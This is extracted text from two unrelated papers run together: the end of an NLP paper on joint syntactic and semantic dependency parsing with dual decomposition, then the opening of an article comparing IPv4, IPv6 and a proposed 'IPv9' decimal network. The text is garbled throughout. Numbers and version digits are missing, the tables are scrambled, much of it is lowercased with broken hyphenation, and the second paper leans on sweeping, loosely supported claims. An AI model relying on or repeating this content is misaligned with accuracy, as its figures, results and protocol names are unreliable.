The key point of the method is that the solutions to Eq. and Eq. can be computed efficiently using separate processes. In particular, Eq. corresponds to a standard dependency parsing problem where for each dependency $\langle h,m,l\rangle$ we have an additional score term $c \cdot \lambda_{h,m,l}$; in our experiments we use the projective dependency parsing algorithm by Eisner. To calculate Eq. we use the assignment method described in Section , where it is straightforward to introduce additional score terms $-\lambda_{h,m,l}$ to every factor $\pi^{p,a,r}_{h,m,l}$. It can be shown that whenever the subgradient method converges, the solutions $\hat{y}$ and $\hat{z}$ are the optimal solutions to our original problem in Eq. (see Koo et al. for a justification). In practice we run the subgradient method for a maximum number of iterations, and return the solutions of the last iteration if it does not converge.

Related work

Recently, there have been a number of approaches to joint parsing of syntactic and semantic dependencies, partly because of the availability of treebanks in this format popularized by the CoNLL shared tasks (Surdeanu et al.; Hajič et al.). Like our method, Johansson defined a model that exploits features of a semantic dependency together with the syntactic path connecting the predicate and the argument. That method uses an approximate parsing algorithm that employs k-best inference and beam search. Similarly, Lluís et al. defined a joint model that forces the predicate structure to be represented in the syntactic dependency tree, by enriching arcs with semantic information. The semantic component uses features of pre-computed syntactic structures that may diverge from the joint structure. In contrast, our joint parsing method is exact whenever the dual decomposition algorithm converges. Titov et al. augmented a transition-based dependency parser with operations that produce synchronous derivations of syntactic and semantic structures.
instead of explicitly representing seman- tic dependencies together with a syntactic path, they induce latent representations of the interactions be- tween syntactic and semantic layers. in all works mentioned the model has no con- trol of assignment constraints that disallow label- ing multiple arguments with the same semantic role. punyakanok et al. ( ) first introduced a system that explicitly controls these constraints, as well as other constraints that look at pairwise assignments which we can not model. they solve srl using general-purpose integer linear programming (ilp) methods. in similar spirit, riedel and mccallum ( ) presented a model for extracting structured events that controls interactions between predicate- argument assignments. they take into account pair- wise assignments and solve the optimization prob- lem with dual decomposition. more recently, das et al. ( ) proposed a dual decomposition method that deals with several assignment constraints for predicate-argument relations. their method is an alternative to general ilp methods. to our knowl- edge, our work is the first that frames srl as a linear assignment task, for which simple and exact algo- rithms exist. we should note that these works model predicate-argument relations with assignment con- straints, but none of them predicts the underlying syntactic structure. our dual decomposition method follows from that of koo et al. ( ). in both cases two separate pro- cesses predict syntactic dependency structures, and the dual decomposition algorithm seeks agreement at the level of individual dependencies. one dif- ference is that our semantic process predicts partial syntax (restricted to syntactic paths connecting pred- icates and arguments), while in their case each of the two processes predicts the full set of dependencies. experiments we present experiments using our syntactic- semantic parser on the conll- shared task english benchmark (hajič et al., ). it consists of the usual wsj training/development/test sections mapped to dependency trees, augmented with se- mantic predicate-argument relations from propbank (palmer et al., ) and nombank (meyers et al., ) also represented as dependencies. it also con- tains a propbanked portion of the brown corpus as an out-of-domain test set. our goal was to evaluate the contributions of pars- ing algorithms in the following configurations: base pipeline runs a syntactic parser and then runs an srl parser constrained to paths of the best syntactic tree. in the srl it only enforces con- straint carg, by simply classifying the candi- date argument in each path into one of the pos- sible semantic roles or as null. pipeline with assignment runs the assignment al- gorithm for srl, enforcing constraints crole and carg, but constrained to paths of the best syntactic tree. forest runs the assignment algorithm for srl on a large set of precomputed syntactic paths, de- scribed below. this configuration corresponds to running dual decomposition for a single it- eration, and is not guaranteed to predict consis- tent syntactic and semantic structures. dual decomposition (dd) runs dual decomposi- tion using the assignment algorithm on the set of precomputed paths. syntactic and semantic structures are consistent when it reaches con- vergence. all four systems used the same type of discrimina- tive scorers and features. next we provide details about these systems. then we present the results. . 
implementation syntactic model we used two discriminative arc- factored models for labeled dependency parsing: a first-order model, and a second-order model with grandchildren interactions, both reimplementations of the parsers by mcdonald et al. ( ) and car- reras ( ) respectively. in both cases we used projective dependency parsing algorithms based on (eisner, ). to learn the models, we used a log-linear loss function following koo et al. ( ), which trains probabilistic discriminative parsers. at test time, we used the probabilistic parsers to compute marginal probabilities p(h,m,l | x), us- ing inside-outside algorithms for first/second-order models. hence, for either of the parsing models, we always obtain a table of first-order marginal scores, with one score per labeled dependency. then we run first-order inference with these marginals to ob- tain the best tree. we found that the higher-order parser performed equally well on development us- ing this method as using second-order inference to predict trees: since we run the parser multiple times within dual decomposition, our strategy results in faster parsing times. precomputed paths both forest and dual de- composition run assignment on a set of precomputed paths, and here we explain how we build it. we first observed that . % of the correct arguments in de- velopment data are either direct descendants of the predicate, direct descendants of an ancestor of the predicate, or an ancestor of the predicate. all meth- ods we test are restricted to this syntactic scope. to generate a list of paths, we did as follows: • calculate marginals of unlabeled dependencies using the first-order parser: p(h,m | x) =∑ l p(h,m,l | x). note that for each m, the probabilities p(h,m|x) for all h form a distri- bution (i.e. they sum to one). then, for each m, keep the most-likely dependencies that cover at least % of the mass, and prune the rest. • starting from a predicate p, generate a path by taking any number of dependencies that as- cend, and optionally adding one dependency that descends. we constrained paths to be pro- jective, and to have a maximum number of our method allows to use non-projective dependency pars- ing methods seamlessly. this is specific to conll- data for english. in gen- eral, for other languages the coverage of these rules may be lower. we leave this question to future work. ascendant dependencies. • label each unlabeled edge 〈h,m〉 in the paths with l = argmaxl p(h,m,l | x). on development data, this procedure generated an average of . paths per predicate that cover . % of the correct paths. in contrast, enumerating paths of the single-best tree covers . % of correct paths for the first-order parser, and . % for the second- order parser. srl model we used a discriminative model with similar features to those in the system of johansson ( ). in addition, we included the following: • unigram/bigram/trigram path features. for all n-grams in the syntactic path, patterns of words and pos tags (e.g., mary+loves+to, mary+vb+to). • voice features. the predicate voice together with the word/pos of the argument (e.g., pas- sive+mary). • path continuity. count of non-consecutive to- kens in a predicate-argument path. to train srl models we used the averaged per- ceptron (collins, ). for the base pipeline we trained standard srl classifiers. for the rest of models we used the structured perceptron running the assignment algorithm as inference routine. 
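For illustration, the sketch below shows a structured-perceptron update of the kind just described, using the assignment step as its inference routine. The feature function, the example attributes and the omission of weight averaging are simplifying assumptions made for the example, not details of the trained models.

```python
import numpy as np

def train_srl_perceptron(examples, feats, n_feats, epochs=5):
    """Structured-perceptron training sketch with assignment-based inference.

    feats(ex, role, arg) is assumed to return a length-n_feats feature vector;
    ex.roles, ex.args and ex.gold (a role-index -> argument-index dict) are
    hypothetical attributes; srl_assignment is the linear-assignment routine
    sketched earlier.
    """
    w = np.zeros(n_feats)
    for _ in range(epochs):
        for ex in examples:
            scores = np.array([[w @ feats(ex, r, a) for a in ex.args]
                               for r in ex.roles])
            pred = srl_assignment(scores)            # inference = assignment step
            if pred != ex.gold:
                for i, j in ex.gold.items():         # promote gold role-argument pairs
                    w += feats(ex, ex.roles[i], ex.args[j])
                for i, j in pred.items():            # demote predicted pairs
                    w -= feats(ex, ex.roles[i], ex.args[j])
    return w
```

A production setup would also average the weight vectors over updates, as in the averaged perceptron cited above.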
In this case, we generated a large set of syntactic paths for training using the procedure described above, and we set the loss function to penalize mistakes in predicting the semantic role of arguments and their syntactic path.

Dual decomposition. We added a parameter β weighting the syntactic and semantic components of the model as follows:

$$(1-\beta)\, s_{syn}(x,y) + \beta\, s_{srl}(x,z,\pi) .$$

As syntactic scores we used normalized marginal probabilities of dependencies, either from the first-order or the higher-order parser. The scores of all factors of the SRL model were normalized at every sentence to be between −1 and 1. The rest of the details of the method were implemented following Koo et al., including the strategy for decreasing the step size $\alpha_t$. We ran the algorithm for up to  iterations, with an initial step size of . .

(One can evaluate the maximum recall on correct arguments that can be obtained, irrespective of whether the syntactic path is correct: for the set of paths it is %, while for single-best trees it is % and % for first- and second-order models.)

Table : Results on development for the baseline and assignment pipelines, running first- and second-order syntactic parsers, and the forest method. o indicates the order of syntactic inference; rows are the pipeline, pipeline with assignment and forest configurations, and columns report LAS, UAS, SemP, SemR, SemF and SemPP.

Results. To evaluate syntactic dependencies we use unlabeled attachment score (UAS), i.e., the percentage of words with the correct head, and labeled attachment score (LAS), i.e., the percentage of words with the correct head and syntactic label. Semantic predicate-argument relations are evaluated with precision (SemP), recall (SemR) and F measure (SemF) at the level of labeled semantic dependencies. In addition, we measure the percentage of perfectly predicted predicate structures (SemPP). (Our evaluation metrics differ slightly from the official metric at CoNLL-: that metric considers predicate senses as special semantic dependencies and thus includes them in the calculation of the evaluation metrics. In this paper we are not addressing predicate sense disambiguation and, consequently, we ignore predicate senses when presenting evaluation results. When we report the performance of CoNLL systems, their scores will be noticeably lower than the scores reported at the shared task; this is because predicate disambiguation is a reasonably simple task with a very high baseline around %.)

Table  shows the results on the development set for our first three methods. We can see that the pipeline methods running assignment improve over the baseline pipelines in semantic F by about  points, due to the application of the crole constraint. The forest method also shows an improvement in recall of semantic roles with respect to the pipeline methods. Presumably, the set of paths available in the forest model allows it to recognize a higher number of arguments at the expense of a lower precision. Regarding the percentage of perfect predicate-argument structures, there is a remarkable improvement in the systems that apply the full set of constraints using the assignment algorithm. We believe that the crole constraint, which ensures no repeated roles for a given predicate, is a key factor to predict the full set of arguments of a predicate.

Table : Results of the dual decomposition method on development data, for different values of the β parameter. o is the order of the syntactic parser; %conv is the percentage of examples that converged; columns report LAS, UAS, SemP, SemR, SemF and SemPP.
The forest configuration is the starting point to run the dual decomposition algorithm. We ran experiments for various values of the β parameter; Table  shows the results. We see that as we increase β, the SRL component has more relative weight, and the syntactic structure changes. The DD methods are always able to improve over the forest methods, and find convergence in more than % of sentences. Compared to the pipeline running assignment, DD improves semantic F for first-order inference, but not for higher-order inference, suggesting that second-order predictions of paths are quite accurate. We also observe slight benefits in syntactic accuracy.

Table  presents results of our system on the test sets, where we run the pipeline with assignment and dual decomposition with our best configuration (β = . / . for first/second-order syntax). For comparison, the table also reports the results of the best CoNLL– joint system, Merlo (Gesmundo et al.), which proved to be very competitive, ranking third in the closed challenge. We also include Lluís (Lluís et al.), which is another joint syntactic-semantic system from CoNLL–. In the WSJ test DD obtains the best syntactic accuracies, while the pipeline obtains the best semantic F. (Another system to compare to is the joint system by Johansson. Unfortunately, a direct comparison is not possible because it is evaluated on the CoNLL- datasets, which are slightly different. Note, however, that Merlo is an application of the system by Titov et al.; in that paper the authors report results on the CoNLL- datasets, and they are comparable to Johansson's.)

Table : Comparative results on the CoNLL– English test sets, namely the WSJ test and the out-of-domain test from the Brown corpus; rows are Lluís, Merlo, pipeline with assignment (first/second order) and DD (first/second order), and columns report LAS, UAS, SemP, SemR, SemF and SemPP.

The bottom part of Table  presents results on the out-of-domain Brown test corpus. In this case, DD obtains slightly better results than the rest, both in terms of syntactic accuracy and semantic F.

Table  shows statistical significance tests for the syntactic LAS and semantic F scores of Table . We have applied the sign test (Wackerly et al.) and approximate randomization tests (Yeh) to all pairs of system outputs. The differences between systems in the WSJ test can be considered significant in almost all cases at p = . . In the Brown test set, results are more unstable and differences are not significant in general, probably because of the relatively small size of that test.

Regarding running times, our implementation of the baseline pipeline with second-order inference parses the development set ( sentences) in less than  minutes. Running assignment in the pipeline increases parsing time by ∼% due to the overhead from the assignment algorithm. The forest method, with an average of  paths per predicate, is ∼% slower than the pipeline due to the exploration of the space of precomputed paths. Finally, dual decomposition with second-order inference converges in  iterations per sentence on average.
the first itera- tion of dd has to perform roughly the same work as forest, while subsequent iterations only need to re-parse the sentence with respect to the dual up- are slightly different. however, note that merlo is an applica- tion of the system by titov et al. ( ). in that paper authors report results on the conll- datasets, and they are com- parable to johansson’s. wsj brown me pa dd pa dd me pa dd pa dd ll ◦•�� ◦•�� •�� ◦•�� ◦•�� �� �� �� ◦•�� ◦•�� me ◦• ◦•�� ◦•�� ◦•�� • • pa ◦•�� ◦•�� ◦•�� • ◦•� ◦•�� dd ◦•�� ◦•�� ◦•� ◦•�� pa •�� table : statistical tests of significance for las and semf differences between pairs of systems from table . ◦/• = las difference is significant by the sign/ approxi- mate randomization tests at . level. �/� = same mean- ing for semf . the legend for systems is: ll: lluı́s , me: merlo , pa / : pipeline with assignment, st/ nd order, dd / : dual decomposition, st/ nd order. dates, which are extremely sparse. our current im- plementation did not take advantage of the sparsity of updates, and overall, dd was on average times slower than the pipeline running assignment and times slower than the baseline pipeline. conclusion we have introduced efficient methods to parse syntactic dependency structures augmented with predicate-argument relations, with two key ideas. one is to predict the local syntactic structure that links a predicate with its arguments, and seek agree- ment with the full syntactic structure using dual decomposition techniques. the second is to con- trol linear assignment constraints in the predicate- argument structure. in experiments we observe large improvements resulting from the assignment constraints. as for the dual decomposition technique for joint parsing, it does improve over the pipelines when we use a first order parser. this means that in this configu- ration the explicit semantic features help to find a solution that is better in both layers. to some ex- tent, this empirically validates the research objec- tive of joint models. however, when we move to second-order parsers the differences with respect to the pipeline are insignificant. it is to be expected that as syntactic parsers improve, the need of joint methods is less critical. it remains an open question to validate if large improvements can be achieved by integrating syntactic-semantic features. to study this question, it is necessary to have efficient pars- ing algorithms for joint dependency structures. this paper contributes with a method that has optimality guarantees whenever it converges. our method can incorporate richer families of fea- tures. it is straightforward to incorporate better se- mantic representations of predicates and arguments than just plain words, e.g. by exploiting wordnet or distributional representations as in (zapirain et al., ). potentially, this could result in larger im- provements in the performance of syntactic and se- mantic parsing. it is also necessary to experiment with differ- ent languages, where the performance of syntactic parsers is lower than in english, and hence there is potential for improvement. our treatment of local syntactic structure that links predicates with argu- ments, based on explicit enumeration of likely paths, was simplistic. future work should explore meth- ods that model the syntactic structure linking predi- cates with arguments: whenever this structure can be parsed efficiently, our dual decomposition algorithm can be employed to define an efficient joint system. 
acknowledgments we thank the editor and the anonymous reviewers for their valuable feedback. this work was financed by the european commission for the xlike project (fp - ); and by the spanish government for project openmt- (tin - -c - ), project skater (tin - -c - ), and a ramón y cajal contract for xavier carreras (ryc- - ). references rainer burkard, mario dell’amico, and silvano martello. . assignment problems. society for industrial and applied mathematics. xavier carreras and lluı́s màrquez. . introduc- tion to the conll- shared task: semantic role labeling. in proceedings of the ninth conference on computational natural language learning (conll- ), pages – , ann arbor, michigan, june. xavier carreras. . experiments with a higher-order projective dependency parser. in proceedings of the conll shared task session of emnlp-conll , pages – , prague, czech republic, june. michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the conference on empirical methods in natural language processing, pages – , july. dipanjan das, andré f. t. martins, and noah a. smith. . an exact dual decomposition algorithm for shallow semantic parsing with constraints. in pro- ceedings of the first joint conference on lexical and computational semantics - volume : proceedings of the main conference and the shared task, and volume : proceedings of the sixth international workshop on semantic evaluation, semeval ’ , pages – , stroudsburg, pa, usa. jason eisner. . bilexical grammars and their cubic- time parsing algorithms. in harry bunt and anton nijholt, editors, advances in probabilistic and other parsing technologies, pages – . kluwer academic publishers, october. andrea gesmundo, james henderson, paola merlo, and ivan titov. . a latent variable model of syn- chronous syntactic-semantic parsing for multiple lan- guages. in proceedings of the thirteenth confer- ence on computational natural language learning (conll ): shared task, pages – , boulder, colorado, june. daniel gildea and daniel jurafsky. . automatic la- beling of semantic roles. computational linguistics, ( ): – , september. daniel gildea and martha palmer. . the necessity of parsing for predicate argument recognition. in pro- ceedings of th annual meeting of the association for computational linguistics, pages – , philadel- phia, pennsylvania, usa, july. jan hajič, massimiliano ciaramita, richard johans- son, daisuke kawahara, maria antònia martı́, lluı́s màrquez, adam meyers, joakim nivre, sebastian padó, jan štěpánek, pavel straňák, mihai surdeanu, nianwen xue, and yi zhang. . the conll- shared task: syntactic and semantic dependen- cies in multiple languages. in proceedings of the th conference on computational natural language learning (conll- ): shared task, pages – , boulder, colorado, usa, june. richard johansson. . statistical bistratal depen- dency parsing. in proceedings of the conference on empirical methods in natural language process- ing, pages – , singapore, august. terry koo, amir globerson, xavier carreras, and michael collins. . structured prediction mod- els via the matrix-tree theorem. in proceedings of the joint conference on empirical methods in nat- ural language processing and computational natu- ral language learning (emnlp-conll), pages – , prague, czech republic, june. terry koo, alexander m. rush, michael collins, tommi jaakkola, and david sontag. . dual decompo- sition for parsing with non-projective head automata. 
in proceedings of the conference on empiri- cal methods in natural language processing, pages – , cambridge, ma, october. harold w. kuhn. . the hungarian method for the assignment problem. naval research logistics quar- terly, ( - ): – . xavier lluı́s, stefan bott, and lluı́s màrquez. . a second-order joint eisner model for syntactic and semantic dependency parsing. in proceedings of the thirteenth conference on computational natu- ral language learning (conll ): shared task, pages – , boulder, colorado, june. lluı́s màrquez, xavier carreras, kenneth c. litkowski, and suzanne stevenson. . semantic role label- ing: an introduction to the special issue. computa- tional linguistics, ( ): – , june. andré martins, noah smith, and eric xing. . con- cise integer linear programming formulations for de- pendency parsing. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , sun- tec, singapore, august. ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in proceedings of the rd annual meet- ing of the association for computational linguistics (acl’ ), pages – , ann arbor, michigan, june. adam meyers, ruth reeves, catherine macleod, rachel szekely, veronika zielinska, brian young, and ralph grishman. . the nombank project: an interim report. in a. meyers, editor, hlt-naacl work- shop: frontiers in corpus annotation, pages – , boston, massachusetts, usa, may. alessandro moschitti. . a study on convolution kernels for shallow statistic parsing. in proceedings of the nd meeting of the association for computa- tional linguistics (acl’ ), main volume, pages – , barcelona, spain, july. joakim nivre and jens nilsson. . pseudo-projective dependency parsing. in proceedings of the rd annual meeting of the association for computa- tional linguistics (acl’ ), pages – , ann ar- bor, michigan, june. martha palmer, daniel gildea, and paul kingsbury. . the proposition bank: an annotated corpus of semantic roles. computational linguistics, ( ): – , march. vasin punyakanok, dan roth, and wen tau yih. . the importance of syntactic parsing and inference in semantic role labeling. computational linguistics, ( ): – , june. sebastian riedel and andrew mccallum. . fast and robust joint models for biomedical event extraction. in proceedings of the conference on empirical methods in natural language processing, pages – , edinburgh, scotland, uk., july. alexander m rush, david sontag, michael collins, and tommi jaakkola. . on dual decomposition and linear programming relaxations for natural language processing. in proceedings of the conference on empirical methods in natural language processing, pages – , cambridge, ma, october. david sontag, amir globerson, and tommi jaakkola. . introduction to dual decomposition for infer- ence. in s. sra, s. nowozin, and s. j. wright, editors, optimization for machine learning. mit press. mihai surdeanu, richard johansson, adam meyers, lluı́s màrquez, and joakim nivre. . the conll shared task on joint parsing of syntactic and se- mantic dependencies. in conll : proceedings of the twelfth conference on computational natu- ral language learning, pages – , manchester, england, august. ivan titov, james henderson, paola merlo, and gabriele musillo. . online graph planarisation for syn- chronous parsing of semantic and syntactic dependen- cies. 
in proceedings of the st international jont conference on artifical intelligence, ijcai’ , pages – . kristina toutanova, aria haghighi, and christopher d. manning. . a global joint model for semantic role labeling. computational linguistics, ( ): – , june. dennis d. wackerly, william mendenhall, and richard l. scheaffer, . mathematical statis- tics with applications, chapter : nonparametric statistics. duxbury press. nianwen xue and martha palmer. . calibrating features for semantic role labeling. in dekang lin and dekai wu, editors, proceedings of emnlp , pages – , barcelona, spain, july. alexander s. yeh. . more accurate tests for the sta- tistical significance of result differences. in proceed- ings of the th conference on computational linguis- tics, pages – . beñat zapirain, eneko agirre, lluı́s màrquez, and mihai surdeanu. . selectional preferences for semantic role classification. computational linguistics, ( ). doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , comparative research on key technologies from ipv , ipv to ipv sun huai school of computer science and engineering xi'an technological university xi'an, , china e-mail: sh @ .com liu zhang school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com abstract—since the united states developed the ipv protocol based on tcp/ip in the s, it has been more than years old. ipv is the "fourth edition of the internet protocol." from a technical point of view, although ipv has a brilliant performance in the past, it seems to have revealed many drawbacks. with the addition of multimedia data streams and security considerations, ipv 's address space is running out of crisis, and ipv is no longer sufficient. under such circumstances, ipv was born as needed. when designing ipv , not only the ipv address space was expanded, but also the parties to the original ipv protocol were reconsidered and a lot of improvements were made. in addition to the large number of addresses, there is higher security, better manageability, and better support for qos and multicast technologies. it is an abbreviation for " th edition of internet protocol." ipv was proposed in to replace the ipv with the iso/osi clnp protocol, using the b nsap address and the platform for the available osi transport protocol. later, ddns was introduced and gradually developed into an ipv decimal network with a -bit address. ipv masters "the right to control the use of the internet, the allocation of ip addresses, the initiative of information monitoring, the right to use routing protocols, and the ownership of technology patents." therefore, the research and application of a new generation of internet protocol next generation has become a worldwide hotspot. keywords-ipv ; ipv ; ipv i. introduction internet protocol (ip) is a communication protocol designed for computers to communicate with each other in the network. ip provides a common rule for computers to access the internet. the internet has become the largest open network in the world. with the rapid development of the global economy, the advancement of communication technology and network technology, the penetration rate of computers and mobile terminals is getting higher and higher. the problems with ipv are also exposed [ ]. for example, in the address space, performance, network security and routing bottlenecks, ipv makes it difficult to meet the needs of the internet in the future. 
to solve the ipv many problems, ipv , ipv and other internet protocols have been born. ii. the status of ipv ipv plays a key role in the development of the network. however, with the continuous expansion of the network scale, it can no longer meet the network development needs. firstly, the address resources are exhausted, which directly leads to the address crisis, although the cidr technology is not classified. the network address translation nat technology alleviated the address crisis, but still cannot solve the problem. secondly, the routing table expansion problem, the topology structure of the address space directly causes international journal of advanced network, monitoring and controls volume , no. , the address allocation form to be independent of the network topology. as the number of networks and routers increases, the excessively expanded routing table increases the lookup and storage overhead and becomes the bottleneck of the internet. at the same time, the length of the packet header is not fixed, and it is very inconvenient to use hardware to implement path extraction, analysis and selection, so it is difficult to improve the routing data throughput rate. there is also an uneven distribution of ip addresses. since most of the addresses are from the united states, most of the addresses are in the united states, resulting in a serious imbalance in ip address allocation. there is also a lack of qos (quality of service) support. the design does not introduce the qos concept. the original intention is for the military. it does not want to be open to the outside world. therefore, it is lacking in quality of service qos and security. it is difficult to be real-time. commercial services such as multimedia and mobile ip provide rich qos functions. although protocols such as rsvp have been developed to provide qos support, the cost of planning and constructing ip networks is relatively high. iii. the characteristics of ipv the ipv protocol is currently widely deployed internet protocols. the ipv protocol is simple, easy to implement, and interoperable. however, with the rapid development of the internet, the shortage of ipv design is becoming more and more obvious. the number of ipv address spaces is insufficient and the number of routing table entries to be maintained is too large[ ]. compared with ipv , ipv has the following characteristics. ) ipv has a larger address space. ipv specified ip address length is bits, there are ^ - addresses, and ipv the ip address length is bits, there are ^ - addresses. compared to the -bit address space, its address space is greatly increased. ) ipv uses a smaller routing table. the ipv address allocation follows the principle of aggregation (aggregation) at the beginning, which enables the router to use a record (entry) to represent a subnet in the routing table, which greatly reduces the length of the routing table in the router and improves router forwarding. the speed of the packet. ) ipv adds enhanced multicast (multicast) support and the support of convection(flow control), which makes multimedia applications on the network has made great development opportunity for quality of service(qos , at quality of service) provides control good network platform. ) ipv has added support for auto configuration. this is an improvement and extension of the dhcp protocol, making network management more convenient and faster. ) better header format. 
ipv uses a new header format with options that are separate from the base header and can be inserted between the base header and the upper layer data if needed. this simplifies and speeds up the routing process because most of the options do not need to be routed. although ipv has obvious advantages, the number of ipv routers is huge. the transition from ipv to ipv is a gradual process, and ipv must have backward compatibility. therefore, the coexistence of ipv and ipv will coexist for a long time. moreover, ipv has great drawbacks in the design of its address structure. ipv confuses the network hierarchy in design. the interface id embeds the address of the physical layer into the logical address layer. in this respect, the space of the physical address forms a restriction on the ip address space, and the security does not belong to the ip layer. designing security technologies at the ip layer should not be. because with the development of security technology, the security method and key length will continue to change, so the development of security technology will eventually lead to the redesign of ip addresses. due to international journal of advanced network, monitoring and controls volume , no. , the chaos of network-level logical relationships, ipv creates far more new problems than it solves. iv. definition of ipv the new ipv network covers three new technologies: address coding design, new addressing mechanism and new address architecture design. it aims to build a core technology system based on the underlying ip network. on this basis, a new framework can be formed. connected and compatible with a network system that covers existing networks (internet with ipv and ipv technologies). us government agency has the authority of the professional and technical confirmation from the law, my country has ip framework with the united states internet network to the prior art, proprietary technology core network sovereignty[ ]. this is the patented technology of ipv (method of using whole digital code to assign address for computer). the official patent name is “the method of allocating addresses to computers using full digital coding”. the ipv protocol refers to the - arabic digital network as the virtual ip address, and uses decimal as the text representation method, which is a convenient way to find online users. in order to improve efficiency and facilitate end users, some of the addresses can be directly used for domain name. at the same time, it is also called “new generation security and reliable information integrated network protocol”. it uses the classification and coding of the original computer network, cable radio and television network and telecommunication network. v. the architecture of ipv by using ipv routers, clients, protocol conversion routers and other devices to build a pure ipv network, ipv /ipv hybrid network to achieve a new generation of internet systems with independent and secure intellectual property rights. including the domestically controllable ipv future network root domain name system, promote technology convergence, service integration, data convergence, and achieve cross-level, cross-regional, cross-system, cross-department, cross-business collaborative management and services. with the data concentration and sharing as the way, we will build a national integrated national big data center, accelerate the promotion of domestically-controlled independent control alternative plans, and build a safe and controllable information technology system. 
separate from the control of the us domain name system and realize the independent domain name system. in order to speed up the promotion of china's international discourse rights and rules-making rights to cyberspace, we will make unremitting efforts towards building a network-strengthening country. in the existing tcp/ip protocol, conventional packet switching cannot support true real-time applications and circuit switching, and supports applications such as transmitting sound or images in circuits in a four-layer protocol. with the demand for voice, image and data triple play, the incompatibility of human-machine interface and the environmental protection requirements for redundant links, especially the original security mechanism is unreasonable, it is imperative to establish a new network theory foundation. so in , china established the decimal network standard working group (also known as ipv working group) to study and implement security-based first-come-authentication communication rules, address encryption, as short as bits up to bits of address space, resource reservation, virtual real circuit the communication network transmission mode, such as character direct addressing and three-layer four-layer hybrid network architecture, was first proposed by china and has formed a demonstration project. the existing tcp/ip protocol is a connectionless, unreliable packet protocol with a maximum packet length of bytes. the tcp/ip/m protocol of ipv , which is led by china, not only inherits the connectionless and unreliable packet protocol of the international journal of advanced network, monitoring and controls volume , no. , existing tcp/ip protocol, but also develops absolute code stream and long stream code. the data packet can reach tens of megabytes or more. after three can be transmitted directly by telephone and cable television data link is established without affecting the existing transmission network until four transmission new transmission theory until they have finished the removal of three of four transport protocol. and continue to develop and develop and manufacture the iso-based future network "naming and addressing" and "safety" led by china. such as: ) based on three / new four-core network architecture of pc desktops and mobile phone network operating system kernel. ) an instruction set of a new kernel based on a three-layer / four-layer network architecture network operating system. ) a chip based on a new core of a three-layer / four-layer network operating system architecture. ) the ipv block domain of the new kernel based on the three-layer / four-layer network operating system architecture. ) new operating network for optical switching and router based on network operating system. ) research and development based on the header encryption system for communication after verification and ipv based mobile phone and industrial control. vi. the advantage of ipv compared with the traditional ipv and ipv , the changes of ipv mainly include the following aspects. ipv has a larger address space than ipv and ipv . the address length of ipv is bits, that is, there are ^ - addresses. the address length of ipv is bits, that is, there are ^ - addresses. but ipv increases the address capacity to bits, that is, there are ^ - addresses. in mobile communications, the biggest drawback of ipv is that there are not enough addresses available for mobile devices that people use. if ipv is widely used, the problem of ip shortages around the world will be solved. b. 
digital domain name system in the digital domain name system, ipv and ipv are domain name resolutions through the united states, while ipv is set by countries, which avoids the limitation of ip addresses and reduces the use of domain names by the state. ipv is a "decimal network" with independent intellectual property rights developed according to the invention patent "method of allocating addresses for computers using all digital encoding". its decimal network introduces a digital domain name system, which can be used to convert the original binary through a decimal network. the address is converted into decimal text, allowing the computers on the network to connect to each other, to communicate and transmit data to each other, and to be compatible with chinese and english domain names. the digital domain name technology used by the ipv decimal network reduces the difficulty of network management, the vast address space and the newly added security mechanism, and solves many problems faced by the existing ipv [ ]. the advantages of other aspects can also meet the different levels of demand for various devices in the future. c. routing in terms of routing, the increase in the size of the internet has caused the ipv routing table to swell, making the efficiency of network routing declining. the emergence of ipv solves this problem, and the optimization of routing improves the efficiency of the network. ipv establishes an ipv tunnel between the mobile unit and the proxy , and then relays the data packet sent to the mobile unit's home address received by the “proxy” used as the mobile unit to the current location of the mobile unit through the tunnel, thereby implementing network terminal mobility support. international journal of advanced network, monitoring and controls volume , no. , the ipv routing table is smaller than ipv . ipv address allocation follows the principle of aggregation, which enables the router to use a record to represent a subnet in the table, which greatly reduces the length of the routing table in the router and improves the routing table forwarding[ ]. ipv ’s routing table is very small. ipv ’s address allocation follows the principle of geospatial clustering. this allows a record in the ipv router to represent a country subnet and an application subnet, greatly reducing the routing in the router. the length and cleanliness of the table increases the speed at which the routing table forwards packets. at the same time, this subnet can express a specific geographical location. according to this logic, only one route is needed between the country and the country. for example, the route to china is / . the ipv routing table is extremely large and irregular. the ipv routing table is smaller than ipv , but the ipv routing table does not contain geographic information and the routing is cluttered. d. security ipv encryption technology and authentication technology have significantly improved than ipv , and the encryption technology proposed by ipv is difficult to decipher at the physical level, and the confidential performance has been significantly improved. however, at the level of network information security, there are still many factors that cause insecure network information in china. the fundamental reason is that the root servers of ipv and ipv are in the united states. many patents related to the network are in the hands of the united states. at the same time, the risk of information exposure may also be introduced. 
the ipv is to have independent intellectual property rights of internet protocol, can bring a lot of protection to the information security of the country. ipv ’s address space enables end-to-end secure transmission, making it possible for people to use devices to directly assign addresses[ ]. both ipv and ipv do not have the concept of national geographic location. most of their domain name resolution servers are in the united states, and ipv proposes the concept of “sovereign equality”, which enables each country to have its own root domain name system, which guarantees that all countries are on the internet. vii. application research of ipv system we designed the following test scenarios to fully reflect the features and advantages of the ipv network system. covers some functions of the ipv network system, and the test case selects several typical scenarios for testing. a. application —pure the ipv network architecture this application implements a pure ipv network architecture. the simplest system includes ipv client / server a, ipv client / server b, g ipv routers c, d. the network topology is shown in figure . figure . pure ipv client - server test topology the pure ipv client - server scenario is suitable for building a pure ipv network in an area, which is suitable for establishing an independent ipv network system. international journal of advanced network, monitoring and controls volume , no. , b. application —ipv network by purely the ipv connected to the network this application implements ipv network applications through pure ipv network communication. the simplest system includes ipv client / server a, ipv client / server b, ipv g router c, d. the network topology is shown in figure . figure . the ipv network by purely the ipv connected to the test network topology this scenario is applicable to ipv networks in several different areas connected through the ipv core network to implement penetration access between different ipv networks. one of the main features is that in addition to the existing ipv network, other areas use ipv protocol transmission, which requires special network connections (such as fiber, ddn line, etc.) between different ipv networks. c. application —ipv network through over connection tunnel this application implements ipv network through over tunnel communication, the simplest system comprising an ipv client / server a, ipv client / server b, the ipv og routers c, d. the biggest difference between scenario and scenario is that the ipv public network address between routers c and d is based on over tunnel communication. this scenario simulates the ipv network using the existing ipv public network to achieve ipv network connectivity in different geographic regions under the current conditions, and has the ability to build a national network. the network topology is shown in figure . figure . the ipv network through over connection topology tunnel test ipv networks in different areas are connected through the ipv over ipv core network to achieve transparent access between different 